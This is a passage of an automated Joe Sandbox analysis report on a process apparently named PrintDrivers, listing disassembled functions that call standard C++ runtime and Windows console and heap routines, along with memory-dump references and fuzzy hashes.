                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 041b3df2052e1853f3aa944db2ff24b958127e45a0add73b42b8914e3456c69c
                                                                    • Instruction ID: 454e4fa6f33b1de6af39bde509e6b3be164f1fda45bae12013544bdc1b418a60
                                                                    • Opcode Fuzzy Hash: 041b3df2052e1853f3aa944db2ff24b958127e45a0add73b42b8914e3456c69c
                                                                    • Instruction Fuzzy Hash: 9B016D3990461A9BCF05EBA4C849ABE7FB1FF84310F254509F851AB291DF749E0ACB81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059629A
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005962A4
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005962F5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596315
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 169d77bb4d2c84cfd8a2859e642a7edd831f0afac4bd179659d9132f980d99eb
                                                                    • Instruction ID: d7211f44498900cb6b839a62ed677caa87d25fd5e6cd6dc1a72d04dc8c03b52e
                                                                    • Opcode Fuzzy Hash: 169d77bb4d2c84cfd8a2859e642a7edd831f0afac4bd179659d9132f980d99eb
                                                                    • Instruction Fuzzy Hash: 8D01C03590051A8BCF09EBA4C859ABE7FA1FFC4310F654549F811AB291DF709E49DB90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596583
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059658D
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005965DE
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005965FE
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 8a9d334aaf0c4d4c3204735f4b510f54eac65bf41d1263729fb635991fab3603
                                                                    • Instruction ID: d0308cf5d777b882fb62fa3c6fa693084d7d91e14516b073767ee29887e96e76
                                                                    • Opcode Fuzzy Hash: 8a9d334aaf0c4d4c3204735f4b510f54eac65bf41d1263729fb635991fab3603
                                                                    • Instruction Fuzzy Hash: B801AD3590012B8BCF05EBA4C959ABE7FB1FFC4320F650508E851AB291DF709E0A8B80
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596618
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596622
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596673
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596693
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 18149e937a272fc7aa3c568f60a0a2c69c728d6971d359fce883864cb35511ad
                                                                    • Instruction ID: 63ef3935d06fc172b663bedde554d3fefdbf7536064b61682d5dd04ee638621a
                                                                    • Opcode Fuzzy Hash: 18149e937a272fc7aa3c568f60a0a2c69c728d6971d359fce883864cb35511ad
                                                                    • Instruction Fuzzy Hash: EA016135900216DBCF05EBA4C859ABE7FB1FFC4310F240509E8656B291DF749E498B91
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00596742
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0059674C
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059679D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005967BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: d52ae89de7add251f6771e222e193c5e19a064e7f5294b6e2a0d7d8cb69fa2b2
                                                                    • Instruction ID: a9891b03a70ce2a4e77445cfa8ef6c8c621640f79fa4099d9358c14ba0a46b34
                                                                    • Opcode Fuzzy Hash: d52ae89de7add251f6771e222e193c5e19a064e7f5294b6e2a0d7d8cb69fa2b2
                                                                    • Instruction Fuzzy Hash: A501ED3590021A8FCF04FBA0C859ABE7FB1FF84324F240409E810AB291DF708E0A8B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005967D7
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005967E1
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00596832
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00596852
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 19e0a230b7f0dab140f1dd8c224b1ada4070b830c8d75413f3d14f0518c7a187
                                                                    • Instruction ID: a13ceb7e9bbd1e66d90e4dbfc5ca22e78576a12216f42ea3becbeba09d6ce87a
                                                                    • Opcode Fuzzy Hash: 19e0a230b7f0dab140f1dd8c224b1ada4070b830c8d75413f3d14f0518c7a187
                                                                    • Instruction Fuzzy Hash: E901A1359002168BCF05FBA08859ABD7FB1FFC4320F240508E4146B291DF709E498B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059686C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00596876
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005968C7
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005968E7
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: b41692c23ee74737950bf85aae53d6d4563be8be2c1ecd6e81a1d3dd91cc0e17
                                                                    • Instruction ID: b2bf97f0e550b743f8d85f1ce2dabf8a56d238c4b3edc18ef9d8859b51e3b3f0
                                                                    • Opcode Fuzzy Hash: b41692c23ee74737950bf85aae53d6d4563be8be2c1ecd6e81a1d3dd91cc0e17
                                                                    • Instruction Fuzzy Hash: E501613590451B9BCF05EBA4C849ABD7FB1FFC4320F144509E855AB291DF709E099B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0846
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0850
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A08A1
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A08C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 788b4b94f8a0664ffcb853be1216e7a54f01d1610ee42ab3ef3c331ff2761efd
                                                                    • Instruction ID: 96bf111d1893925d4ff64851bd3768149e3b32dfc0919e3d30bf34b4fa62151c
                                                                    • Opcode Fuzzy Hash: 788b4b94f8a0664ffcb853be1216e7a54f01d1610ee42ab3ef3c331ff2761efd
                                                                    • Instruction Fuzzy Hash: E801A13590021B9FCB05EBA08859ABD7FB1FF85320F144508F8106B2D1DF749E468BC1
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A08DB
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A08E5
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0936
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0956
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: b00686f6ca4102910435f8201a60601529169c727337d37a90e774dd19753f5e
                                                                    • Instruction ID: 8bbd33efcd345bf2a92bfaef362f262fdf1086d7f88194db0e74428389bbcb4b
                                                                    • Opcode Fuzzy Hash: b00686f6ca4102910435f8201a60601529169c727337d37a90e774dd19753f5e
                                                                    • Instruction Fuzzy Hash: A901A13590011A8FDB05EBA0C859ABF7FA5FFC5310F144508F450AB2D2DF709E059B81
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0A9A
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0AA4
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0AF5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0B15
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: 9222010c6ae9f2a0e87df78c4b68d84f98c31c856de8700096493be277988249
                                                                    • Instruction ID: 9e5b7feb7604f1afd7e76a78111c62c81df533783b6b79b3faf03b13eb57b865
                                                                    • Opcode Fuzzy Hash: 9222010c6ae9f2a0e87df78c4b68d84f98c31c856de8700096493be277988249
                                                                    • Instruction Fuzzy Hash: 3201C03590021A9BCB05EFA0C849ABE7FA5FFC5310F244508F851AB2D2DF749E069B90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A0B2F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 005A0B39
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 005A0B8A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005A0BAA
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: dd60e6683fa279d6045984c5f02b86fc7e06b559df34e7e128da7de7f6d07f0a
                                                                    • Instruction ID: 90d92c4eda412d93de625f4d806a930865f6bf608085d90e6bcf705a5d8eb031
                                                                    • Opcode Fuzzy Hash: dd60e6683fa279d6045984c5f02b86fc7e06b559df34e7e128da7de7f6d07f0a
                                                                    • Instruction Fuzzy Hash: CD01A13590022A8FCB05EBA0C849ABD7FA1FFC5320F150508E460AB2D2DF709E058B90
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595CC8
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595CD2
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595D23
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595D43
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID:
                                                                    • API String ID: 2854358121-0
                                                                    • Opcode ID: e245573263e8a1eaf88aeb49d842871590286b2ea86e2b8c9c61c62e9293a8b3
                                                                    • Instruction ID: 1ccb587f9736fd39f4aa06ba6e111443ec7fddf7716382b8a59d6192132c25b5
                                                                    • Opcode Fuzzy Hash: e245573263e8a1eaf88aeb49d842871590286b2ea86e2b8c9c61c62e9293a8b3
                                                                    • Instruction Fuzzy Hash: 7201613590061A9BCF06EBA4884DABE7FA5FF84310F550549F8156B2D1EF709E468BC1
APIs
• __EH_prolog3.LIBCMT ref: 00590D14
• std::_Lockit::_Lockit.LIBCPMT ref: 00590D1E
  • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
  • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
• std::_Facet_Register.LIBCPMT ref: 00590D6F
• std::_Lockit::~_Lockit.LIBCPMT ref: 00590D8F
Memory Dump Source
• Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
• Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID:
• API String ID: 2854358121-0
• Opcode ID: 2bbd212712c8cbef11962f847b483a50bb672aaf4016967bb8b02b7c7ba22fc5
• Instruction ID: ac15f9e27e4f478260129b88be468ab5a21dcf1193718e146e9f3cad73f66e8b
• Opcode Fuzzy Hash: 2bbd212712c8cbef11962f847b483a50bb672aaf4016967bb8b02b7c7ba22fc5
• Instruction Fuzzy Hash: B501A1359002169FCF05EBA4C849ABE7FB5FFC4310F141908E9216B2D1DF74AE458B80
APIs
• __EH_prolog3.LIBCMT ref: 00590DA9
• std::_Lockit::_Lockit.LIBCPMT ref: 00590DB3
  • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
  • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
• std::_Facet_Register.LIBCPMT ref: 00590E04
• std::_Lockit::~_Lockit.LIBCPMT ref: 00590E24
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID:
• API String ID: 2854358121-0
• Opcode ID: c74c81ba9a4e3596781b8b0a0df4ce1bbd3e87187177f32db6e26ed8176b2e86
• Instruction ID: 5d235663d36c510bfcb37fa306862349963795e8f1aab03bb1ebc7dc5d66ef8b
• Opcode Fuzzy Hash: c74c81ba9a4e3596781b8b0a0df4ce1bbd3e87187177f32db6e26ed8176b2e86
• Instruction Fuzzy Hash: 8E01A1359002278FCF05EBA4C849ABE7FA5FFC4710F250948E8256B2D1DF709E468B80
APIs
• __EH_prolog3.LIBCMT ref: 00590E3E
• std::_Lockit::_Lockit.LIBCPMT ref: 00590E48
  • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
  • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
• std::_Facet_Register.LIBCPMT ref: 00590E99
• std::_Lockit::~_Lockit.LIBCPMT ref: 00590EB9
Similarity
• API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
• String ID:
• API String ID: 2854358121-0
• Opcode ID: 93d4c5389002c38e5eab19a6e039228890c17eda32cfcb5e2f16ef1d3e72cd40
• Instruction ID: e28856ca548c05d7bea9258d43631789da73975d0e1ce6c93e73b6ff4b387a6e
• Opcode Fuzzy Hash: 93d4c5389002c38e5eab19a6e039228890c17eda32cfcb5e2f16ef1d3e72cd40
• Instruction Fuzzy Hash: CA01A1359006279FCF05FBA08849ABE7FA9FFC4720F144908E8156B2D1DF749E068B81
APIs
• WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,00000000,?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000), ref: 005C40ED
• GetLastError.KERNEL32(?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000,?,00000000,?,005C326E,00000010), ref: 005C40F9
  • Part of subcall function 005C40BF: CloseHandle.KERNEL32(FFFFFFFE,005C4109,?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000,?,00000000), ref: 005C40CF
• ___initconout.LIBCMT ref: 005C4109
  • Part of subcall function 005C4081: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,005C40B0,005C3AB9,00000000,?,005C2D22,?,00000000,00000000,?), ref: 005C4094
• WriteConsoleW.KERNEL32(00000000,00000020,00000000,00000000,?,005C3ACC,00000000,00000001,00000000,00000000,?,005C2D22,?,00000000,00000000,?), ref: 005C411E
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
• Opcode ID: d16d7a9f9d6dac156735b592e085c8f2d32a424ec080e7044a43fd4c744a2ddf
• Instruction ID: 6ac99b0e14c352b5192cb18eb489783d46fa3d367baca7fc2a89bce56075f9ad
• Opcode Fuzzy Hash: d16d7a9f9d6dac156735b592e085c8f2d32a424ec080e7044a43fd4c744a2ddf
• Instruction Fuzzy Hash: C5F01C36440125BFCF222FD1DC0CE893F26FB683B1B084015FA1D96121C6328864EF90
APIs
• _free.LIBCMT ref: 005B4766
  • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
  • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
• _free.LIBCMT ref: 005B4779
• _free.LIBCMT ref: 005B478A
• _free.LIBCMT ref: 005B479B
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 0c1badbf56d188aae96da00ccd9c87ce397536a78bb5bcdd989b162fe3942e85
• Instruction ID: 01a41c102a7566aab5c1e5a5450491eab8b09a218f7733a6259a3b60de99bbe4
• Opcode Fuzzy Hash: 0c1badbf56d188aae96da00ccd9c87ce397536a78bb5bcdd989b162fe3942e85
• Instruction Fuzzy Hash: 29E04F7C8009B29E96196F11BC858897E26FBF87413404207F4914E231C7391019FFCC
APIs
• __EH_prolog3_GS.LIBCMT ref: 0059232B
  • Part of subcall function 00590ECC: __EH_prolog3.LIBCMT ref: 00590ED3
  • Part of subcall function 00590ECC: std::_Lockit::_Lockit.LIBCPMT ref: 00590EDD
  • Part of subcall function 00590ECC: std::_Lockit::~_Lockit.LIBCPMT ref: 00590F4E
• _Find_elem.LIBCPMT ref: 0059253D
Strings
• 0123456789ABCDEFabcdef-+Xx, xrefs: 00592393
Similarity
• API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
• String ID: 0123456789ABCDEFabcdef-+Xx
• API String ID: 2544715827-2799312399
• Opcode ID: 7fb17492e21adf09f0eed3c26de2583ddff9ccc46f72280fdf58b1755716ad2c
• Instruction ID: 68d2be95d3589d40b70172504f3a0d1ea99191c38f8cfacaf091211b3a5b714c
• Opcode Fuzzy Hash: 7fb17492e21adf09f0eed3c26de2583ddff9ccc46f72280fdf58b1755716ad2c
• Instruction Fuzzy Hash: 95D1A931D04289AEDF25DBA8C494BECBFB6BF45310F684459D8896F283DB349D86CB50
APIs
• __EH_prolog3_GS.LIBCMT ref: 00598D1B
  • Part of subcall function 005966A6: __EH_prolog3.LIBCMT ref: 005966AD
  • Part of subcall function 005966A6: std::_Lockit::_Lockit.LIBCPMT ref: 005966B7
  • Part of subcall function 005966A6: std::_Lockit::~_Lockit.LIBCPMT ref: 00596728
• _Find_elem.LIBCPMT ref: 00598F6B
Strings
• 0123456789ABCDEFabcdef-+Xx, xrefs: 00598D92
Similarity
• API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
• String ID: 0123456789ABCDEFabcdef-+Xx
• API String ID: 2544715827-2799312399
• Opcode ID: c89dec89243e602de3999a9be8640af64b61893639f04696883223fb89d42085
• Instruction ID: 87357737f86f0ce47a8322f69a687b94fff028ebde27918eb402a2b410199c3f
• Opcode Fuzzy Hash: c89dec89243e602de3999a9be8640af64b61893639f04696883223fb89d42085
